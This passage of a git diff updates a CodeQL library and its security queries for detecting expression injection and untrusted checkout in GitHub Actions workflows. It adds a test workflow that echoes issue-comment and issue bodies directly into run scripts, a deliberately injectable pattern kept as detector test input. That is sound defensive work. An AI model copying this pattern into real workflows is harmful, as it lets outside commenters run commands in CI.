} string getAnOutputName() { @@ -285,14 +414,14 @@ class Strategy extends WorkflowNode { /** * Gets a specific matric expression (YamlMapping) by name. */ - StringLiteral getMatrixVar(string name) { + StringValue getMatrixVar(string name) { this.asYamlMapping().lookup("matrix").(YamlMapping).lookup(name) = result.asYamlNode() } /** * Gets a specific matric expression (YamlMapping) by name. */ - StringLiteral getAMatrixVar() { + StringValue getAMatrixVar() { this.asYamlMapping().lookup("matrix").(YamlMapping).lookup(_) = result.asYamlNode() } } @@ -312,17 +441,7 @@ class Needs extends WorkflowNode { Job getANeededJob() { result.getId() = this.asYamlNode().(YamlMappingLikeNode).getNode(_).(YamlString).getValue() and - result.getLocation().getFile() = job.getLocation().getFile() - // if this instanceof YamlString - // then - // result.getId() = this.(YamlString).getValue() and - // result.getLocation().getFile() = job.getLocation().getFile() - // else - // if this instanceof YamlSequence - // then - // result.getId() = this.(YamlSequence).getElementNode(_).(YamlString).getValue() and - // result.getLocation().getFile() = job.getLocation().getFile() - // else none() + result.getFile() = job.getFile() } } @@ -378,9 +497,9 @@ class Job extends WorkflowNode { */ Outputs getOutputs() { result.asYamlNode() = this.asYamlMapping().lookup("outputs") } - StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } + ExpressionNode getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } - StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } + ExpressionNode getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } /** * Reusable workflow jobs may have Uses children @@ -448,7 +567,7 @@ abstract class Uses extends WorkflowNode { abstract string getVersion(); - abstract StringLiteral getArgument(string key); + abstract ExpressionNode getArgumentExpr(string key); override string toString() { result = "Uses Step" } } @@ -482,8 +601,11 @@ class UsesStep extends Step, Uses { /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { result = uses.getValue().regexpCapture(usesParser(), 3) } - override StringLiteral getArgument(string key) { - result.asYamlNode() = this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) + override Expression getArgumentExpr(string key) { + exists(StringValue l | + l.asYamlNode() = this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) and + result = l.getAnExpression() + ) } override string toString() { @@ -535,8 +657,11 @@ class UsesJob extends Uses { ) } - override StringLiteral getArgument(string key) { - this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) = result.asYamlNode() + override ExpressionNode getArgumentExpr(string key) { + exists(StringValue l | + this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) = l.asYamlNode() and + result = l.getAnExpression() + ) } } @@ -545,11 +670,11 @@ class UsesJob extends Uses { * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. */ class Run extends Step { - StringLiteral script; + StringValue script; Run() { this.asYamlMapping().maps(any(YamlString s | s.getValue() = "run"), script.asYamlNode()) } - StringLiteral getScript() { result = script } + StringValue getScript() { result = script } override string toString() { if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" @@ -559,19 +684,29 @@ class Run extends Step { /** * A YamlString part of a YamlSequence or YamlMapping values. */ -class StringLiteral extends WorkflowNode { - StringLiteral() { +class StringValue extends WorkflowNode { + YamlNode keyNode; + + StringValue() { n instanceof YamlString and exists(YamlCollection c | - c instanceof YamlMapping and - c.(YamlMapping).maps(_, this.asYamlNode()) - or - c instanceof YamlSequence and - c.(YamlSequence).getElementNode(_) = this.asYamlNode() + c = keyNode and + ( + c instanceof YamlMapping and + //c.(YamlMapping).maps(_, this.asYamlNode()) + exists(int i | this.asYamlNode() = c.(YamlMapping).getValueNode(i)) + or + c instanceof YamlSequence and + c.(YamlSequence).getElementNode(_) = this.asYamlNode() + ) ) } string getValue() { result = this.asYamlNode().(YamlString).getValue() } + + YamlNode getKeyNode() { result = keyNode } + + ExpressionNode getAnExpression() { result = this.getAChildNode() } } /** @@ -580,27 +715,16 @@ class StringLiteral extends WorkflowNode { * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} */ -string getASimpleReferenceExpression(YamlString node) { +string getASimpleReferenceExpression(StringValue node, int offset) { // We use `regexpFind` to obtain *all* matches of `${{...}}`, // not just the last (greedy match) or first (reluctant match). result = node.getValue() - .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, _) - .regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) + .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset) + .regexpCapture("(\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+\\s*\\}\\})", 1) } -/** - * A StringLiteral containing a workflow expression ${{}}. - */ -class Expression extends StringLiteral { - string expr; - - Expression() { expr = getASimpleReferenceExpression(this.asYamlNode()) } - - string getExpression() { result = expr } - - Job getJob() { result.getAChildNode*() = this } -} +class Expression extends ExpressionNode { } /** * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. @@ -608,15 +732,16 @@ class Expression extends StringLiteral { */ class ContextExpression extends Expression { ContextExpression() { - expr.regexpMatch([ - stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), - matrixCtxRegex() - ]) + expression + .regexpMatch([ + stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), + matrixCtxRegex() + ]) } abstract string getFieldName(); - abstract WorkflowNode getTarget(); + abstract AstNode getTarget(); } private string stepsCtxRegex() { @@ -654,15 +779,15 @@ class StepsExpression extends ContextExpression { string fieldName; StepsExpression() { - expr.regexpMatch(stepsCtxRegex()) and - stepId = expr.regexpCapture(stepsCtxRegex(), 1) and - fieldName = expr.regexpCapture(stepsCtxRegex(), 2) + expression.regexpMatch(stepsCtxRegex()) and + stepId = expression.regexpCapture(stepsCtxRegex(), 1) and + fieldName = expression.regexpCapture(stepsCtxRegex(), 2) } override string getFieldName() { result = fieldName } - override WorkflowNode getTarget() { - this.getLocation().getFile() = result.getLocation().getFile() and + override AstNode getTarget() { + this.getFile() = result.getFile() and result.(Step).getId() = stepId } } @@ -678,9 +803,9 @@ class NeedsExpression extends ContextExpression { string fieldName; NeedsExpression() { - expr.regexpMatch(needsCtxRegex()) and - neededJobId = expr.regexpCapture(needsCtxRegex(), 1) and - fieldName = expr.regexpCapture(needsCtxRegex(), 2) and + expression.regexpMatch(needsCtxRegex()) and + neededJobId = expression.regexpCapture(needsCtxRegex(), 1) and + fieldName = expression.regexpCapture(needsCtxRegex(), 2) and neededJob.getId() = neededJobId } @@ -688,8 +813,8 @@ class NeedsExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override WorkflowNode getTarget() { - neededJob.getLocation().getFile() = this.getLocation().getFile() and + override AstNode getTarget() { + neededJob.getFile() = this.getFile() and this.getJob().getANeededJob() = neededJob and ( // regular jobs @@ -711,17 +836,17 @@ class JobsExpression extends ContextExpression { string fieldName; JobsExpression() { - expr.regexpMatch(jobsCtxRegex()) and - jobId = expr.regexpCapture(jobsCtxRegex(), 1) and - fieldName = expr.regexpCapture(jobsCtxRegex(), 2) + expression.regexpMatch(jobsCtxRegex()) and + jobId = expression.regexpCapture(jobsCtxRegex(), 1) and + fieldName = expression.regexpCapture(jobsCtxRegex(), 2) } override string getFieldName() { result = fieldName } - override WorkflowNode getTarget() { + override AstNode getTarget() { exists(Job job | job.getId() = jobId and - job.getLocation().getFile() = this.getLocation().getFile() and + job.getFile() = this.getFile() and job.getOutputs() = result ) } @@ -736,14 +861,14 @@ class InputsExpression extends ContextExpression { string fieldName; InputsExpression() { - expr.regexpMatch(inputsCtxRegex()) and - fieldName = expr.regexpCapture(inputsCtxRegex(), 1) + expression.regexpMatch(inputsCtxRegex()) and + fieldName = expression.regexpCapture(inputsCtxRegex(), 1) } override string getFieldName() { result = fieldName } - override WorkflowNode getTarget() { - result.getLocation().getFile() = this.getLocation().getFile() and + override AstNode getTarget() { + result.getFile() = this.getFile() and ( exists(ReusableWorkflow w | w.getInput(fieldName) = result) or @@ -761,15 +886,15 @@ class EnvExpression extends ContextExpression { string fieldName; EnvExpression() { - expr.regexpMatch(envCtxRegex()) and - fieldName = expr.regexpCapture(envCtxRegex(), 1) + expression.regexpMatch(envCtxRegex()) and + fieldName = expression.regexpCapture(envCtxRegex(), 1) } override string getFieldName() { result = fieldName } - override WorkflowNode getTarget() { + override AstNode getTarget() { exists(WorkflowNode s | - s.getEnvVar(fieldName) = result and + s.getInScopeEnvVarExpr(fieldName) = result and s.getAChildNode*() = this ) } @@ -784,13 +909,13 @@ class MatrixExpression extends ContextExpression { string fieldName; MatrixExpression() { - expr.regexpMatch(matrixCtxRegex()) and - fieldName = expr.regexpCapture(matrixCtxRegex(), 1) + expression.regexpMatch(matrixCtxRegex()) and + fieldName = expression.regexpCapture(matrixCtxRegex(), 1) } override string getFieldName() { result = fieldName } - override WorkflowNode getTarget() { + override AstNode getTarget() { exists(Workflow w | w.getStrategy().getMatrixVar(fieldName) = result and w.getAChildNode*() = this diff --git a/ql/lib/codeql/actions/ast/internal/Yaml.qll b/ql/lib/codeql/actions/ast/internal/Yaml.qll index 402ceae44ced..49b83df48db5 100644 --- a/ql/lib/codeql/actions/ast/internal/Yaml.qll +++ b/ql/lib/codeql/actions/ast/internal/Yaml.qll @@ -11,7 +11,14 @@ private module YamlSig implements LibYaml::InputSig { import codeql.Locations class LocatableBase extends @yaml_locatable { - Location getLocation() { yaml_locations(this, result) } + Location getLocation() { + exists(@location_default loc, File f, string p, int sl, int sc, int el, int ec | + f.getAbsolutePath() = p and + locations_default(loc, f, sl, sc, el, ec) and + yaml_locations(this, loc) and + result = TBaseLocation(p, sl, sc, el, ec) + ) + } string toString() { none() } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 6015e6336ca2..0972ae500398 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -80,7 +80,7 @@ module Completion { } module CfgScope { - abstract class CfgScope extends AstNode { } + abstract class CfgScope extends WorkflowNode { } class WorkflowScope extends CfgScope instanceof Workflow { } @@ -148,7 +148,7 @@ private class CompositeActionTree extends StandardPreOrderTree instanceof Compos rank[i](AstNode child, Location l | ( child = this.(CompositeAction).getAnInput() or - child = this.(CompositeAction).getAnOutput() or + child = this.(CompositeAction).getAnOutputExpr() or child = this.(CompositeAction).getRuns() ) and l = child.getLocation() @@ -172,7 +172,7 @@ private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { rank[i](AstNode child, Location l | ( child = this.(ReusableWorkflow).getAnInput() or - child = this.(ReusableWorkflow).getAnOutput() or + child = this.(ReusableWorkflow).getAnOutputExpr() or child = this.(ReusableWorkflow).getStrategy() or child = this.(ReusableWorkflow).getAJob() ) and @@ -202,7 +202,7 @@ private class OutputsTree extends StandardPreOrderTree instanceof Outputs { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - child = super.getOutput(_) and l = child.getLocation() + child = super.getOutputExpr(_) and l = child.getLocation() | child order by @@ -247,7 +247,7 @@ private class UsesTree extends StandardPreOrderTree instanceof Uses { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - (child = super.getArgument(_) or child = super.getEnvVar(_)) and + (child = super.getArgumentExpr(_) or child = super.getInScopeEnvVarExpr(_)) and l = child.getLocation() | child @@ -261,7 +261,7 @@ private class RunTree extends StandardPreOrderTree instanceof Run { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - (child = super.getEnvVar(_) or child = super.getScript()) and + (child = super.getInScopeEnvVarExpr(_) or child = super.getScript()) and l = child.getLocation() | child @@ -271,8 +271,21 @@ private class RunTree extends StandardPreOrderTree instanceof Run { } } +private class StringValueTree extends StandardPreOrderTree instanceof StringValue { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](ExpressionNode child, int sl, int el, int sc, int ec, string path | + child = super.getAChildNode() and child.hasLocationInfo(path, sl, sc, el, ec) + | + child order by sl, sc, ec, el, child.toString() + ) + } +} + private class UsesLeaf extends LeafTree instanceof Uses { } private class InputTree extends LeafTree instanceof Input { } -private class StringLiteralLeaf extends LeafTree instanceof StringLiteral { } +private class StringValueLeaf extends LeafTree instanceof StringValue { } + +private class ExpressionLeaf extends LeafTree instanceof ExpressionNode { } diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index c427f8b828a0..008b5a19ce63 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -52,7 +52,7 @@ predicate externallyDefinedSource( ) and ( if fieldName.trim().matches("env.%") - then source.asExpr() = uses.getEnvVar(fieldName.trim().replaceAll("env.", "")) + then source.asExpr() = uses.getInScopeEnvVarExpr(fieldName.trim().replaceAll("env.", "")) else if fieldName.trim().matches("output.%") then source.asExpr() = uses @@ -76,10 +76,10 @@ predicate externallyDefinedStoreStep( ) and ( if input.trim().matches("env.%") - then pred.asExpr() = uses.getEnvVar(input.trim().replaceAll("env.", "")) + then pred.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) else if input.trim().matches("input.%") - then pred.asExpr() = uses.getArgument(input.trim().replaceAll("input.", "")) + then pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) else none() ) and succ.asExpr() = uses @@ -90,10 +90,10 @@ predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { exists(Uses uses, string action, string version, string input | ( if input.trim().matches("env.%") - then sink.asExpr() = uses.getEnvVar(input.trim().replaceAll("env.", "")) + then sink.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) else if input.trim().matches("input.%") - then sink.asExpr() = uses.getArgument(input.trim().replaceAll("input.", "")) + then sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) else none() ) and sinkModel(action, version, input, kind) and diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 0dea91af2b92..7cfde2a6f9ff 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -36,7 +36,7 @@ class AdditionalTaintStep extends Unit { predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run r, string varName, string output | c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and - r.getEnvVar(varName) = pred.asExpr() and + r.getInScopeEnvVarExpr(varName) = pred.asExpr() and exists(string script, string line | script = r.getScript().getValue() and line = script.splitAt("\n") and diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 57ef47434871..65e2abaa6c64 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -72,8 +72,7 @@ class DataFlowCall instanceof Cfg::Node { /** Gets a textual representation of this element. */ string toString() { result = super.toString() } - Location getLocation() { result = super.getLocation() } - + //Location getLocation() { result = super.getLocation() } string getName() { result = super.getAstNode().(Uses).getCallee() } DataFlowCallable getEnclosingCallable() { result = super.getScope() } @@ -85,8 +84,7 @@ class DataFlowCall instanceof Cfg::Node { class DataFlowCallable instanceof Cfg::CfgScope { string toString() { result = super.toString() } - Location getLocation() { result = super.getLocation() } - + //Location getLocation() { result = super.getLocation() } string getName() { if this instanceof ReusableWorkflow then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() @@ -162,7 +160,7 @@ class ParameterPosition extends string { * Made a string to match `With:` keys in the AST */ class ArgumentPosition extends string { - ArgumentPosition() { exists(any(Uses e).getArgument(this)) } + ArgumentPosition() { exists(any(Uses e).getArgumentExpr(this)) } } /** @@ -232,7 +230,7 @@ predicate matrixCtxLocalStep(Node nodeFrom, Node nodeTo) { * e.g. ${{ env.foo }} */ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, EnvExpression astTo | + exists(AstNode astFrom, EnvExpression astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( @@ -301,7 +299,7 @@ predicate readStep(Node node1, ContentSet c, Node node2) { ctxFieldReadStep(node */ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { exists(Outputs out, string fieldName | - node1.asExpr() = out.getOutput(fieldName) and + node1.asExpr() = out.getOutputExpr(fieldName) and node2.asExpr() = out and c = any(FieldContent ct | ct.getName() = fieldName) ) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 3a21005e29be..dbae273151b0 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -78,12 +78,12 @@ class CallNode extends ExprNode { * An argument to a Uses step (call). */ class ArgumentNode extends ExprNode { - ArgumentNode() { this.getCfgNode().getAstNode() = any(Uses e).getArgument(_) } + ArgumentNode() { this.getCfgNode().getAstNode() = any(Uses e).getArgumentExpr(_) } predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { this.getCfgNode() = call.(Cfg::Node).getASuccessor+() and call.(Cfg::Node).getAstNode() = - any(Uses e | e.getArgument(pos) = this.getCfgNode().getAstNode()) + any(Uses e | e.getArgumentExpr(pos) = this.getCfgNode().getAstNode()) } } diff --git a/ql/lib/ext/PLACEHOLDER.model.yml b/ql/lib/ext/actions_github-script.model.yml similarity index 57% rename from ql/lib/ext/PLACEHOLDER.model.yml rename to ql/lib/ext/actions_github-script.model.yml index 2f549573a533..df5b1f70ae56 100644 --- a/ql/lib/ext/PLACEHOLDER.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml @@ -3,5 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["","","",""] + - ["actions/github-script","*","input.script","expression-injection"] + + diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index ac829c2395e8..096c19b48d04 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -18,7 +18,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript() = this.asExpr()) or + exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 02e17b76ac5c..0edeb0a7ec80 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -24,7 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(CompositeAction c | c.getAnOutput() = sink.asExpr()) + exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql index 7ca865609983..59a05f64b6c9 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql @@ -22,7 +22,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(CompositeAction c | c.getAnOutput() = sink.asExpr()) + exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index fd4350efae8a..040251045c87 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -18,7 +18,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript() = this.asExpr()) or + exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql index 7b0f3159357c..6e88f36feced 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql @@ -24,7 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflow w | w.getAnOutput() = sink.asExpr()) + exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql index 699c5b2b5dcb..4f710a16e8f6 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql @@ -22,7 +22,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflow w | w.getAnOutput() = sink.asExpr()) + exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index 1f7797b8a0a7..590660ce63b1 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript() = this.asExpr()) or + exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } @@ -43,4 +43,5 @@ where .getEnclosingWorkflow() .hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) select sink.getNode(), source, sink, - "Potential expression injection, which may be controlled by an external user." + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(ExpressionNode).getExpression() diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 0bf4e858db20..0d0bb39c41ea 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript() = this.asExpr()) or + exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } @@ -37,4 +37,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection, which may be controlled by an external user." + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(ExpressionNode).getRawExpression() diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 2e3dc7049bd6..db341e0c5ccc 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -39,8 +39,7 @@ where job.getAStep() = checkoutStep and checkoutStep.getCallee() = "actions/checkout" and checkoutStep - .getArgument("ref") - .(Expression) + .getArgumentExpr("ref") .getExpression() .matches([ "%github.event.pull_request.head.ref%", "%github.event.pull_request.head.sha%", diff --git a/ql/test/library-tests/.github/workflows/expression_nodes.yml b/ql/test/library-tests/.github/workflows/expression_nodes.yml new file mode 100644 index 000000000000..1d40cabdd6ac --- /dev/null +++ b/ql/test/library-tests/.github/workflows/expression_nodes.yml @@ -0,0 +1,22 @@ +on: issue_comment + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: LINE 1echo '${{ github.event.comment.body }}' + - run: | + LINE 1 echo '${{ github.event.comment.body }}' + - run: | + LINE 1 echo '${{ github.event.comment.body }}' + LINE 2 echo '${{github.event.issue.body}}' + - run: > + LINE 1 echo '${{ github.event.comment.body }}' + echo '${{github.event.issue.body}}' + - run: | + LINE 1 echo '${{ github.event.comment.body }}' + LINE 2 echo '${{github.event.issue.body}}' + LINE 3 echo '${{ github.event.comment.body }}' + - run: "LINE 1 echo '${{ github.event.comment.body }}' + echo '${{github.event.issue.body}}'" + diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 4d290a906044..ca481768671c 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -1,6 +1,36 @@ files +| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | | .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | yamlNodes +| .github/workflows/expression_nodes.yml:1:1:1:2 | on | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:3:1:3:4 | jobs | +| .github/workflows/expression_nodes.yml:4:3:4:14 | echo-chamber | +| .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | +| .github/workflows/expression_nodes.yml:5:5:5:11 | runs-on | +| .github/workflows/expression_nodes.yml:5:5:21:47 | runs-on ... -latest | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | +| .github/workflows/expression_nodes.yml:6:5:6:9 | steps | +| .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:7:9:7:11 | run | +| .github/workflows/expression_nodes.yml:7:9:8:6 | run: LI ... ody }}' | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | +| .github/workflows/expression_nodes.yml:8:9:8:11 | run | +| .github/workflows/expression_nodes.yml:8:9:10:6 | run: \| | +| .github/workflows/expression_nodes.yml:8:14:9:57 | \| | +| .github/workflows/expression_nodes.yml:10:9:10:11 | run | +| .github/workflows/expression_nodes.yml:10:9:13:6 | run: \| | +| .github/workflows/expression_nodes.yml:10:14:12:53 | \| | +| .github/workflows/expression_nodes.yml:13:9:13:11 | run | +| .github/workflows/expression_nodes.yml:13:9:16:6 | run: > | +| .github/workflows/expression_nodes.yml:13:14:15:46 | > | +| .github/workflows/expression_nodes.yml:16:9:16:11 | run | +| .github/workflows/expression_nodes.yml:16:9:20:6 | run: \| | +| .github/workflows/expression_nodes.yml:16:14:19:57 | \| | +| .github/workflows/expression_nodes.yml:20:9:20:11 | run | +| .github/workflows/expression_nodes.yml:20:9:21:47 | run: "L ... ody }}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | | .github/workflows/test.yml:1:1:1:2 | on | | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | @@ -71,15 +101,47 @@ yamlNodes | .github/workflows/test.yml:40:9:40:11 | run | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | jobNodes +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | stepNodes +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +runNodes +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +runExprNodes +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | 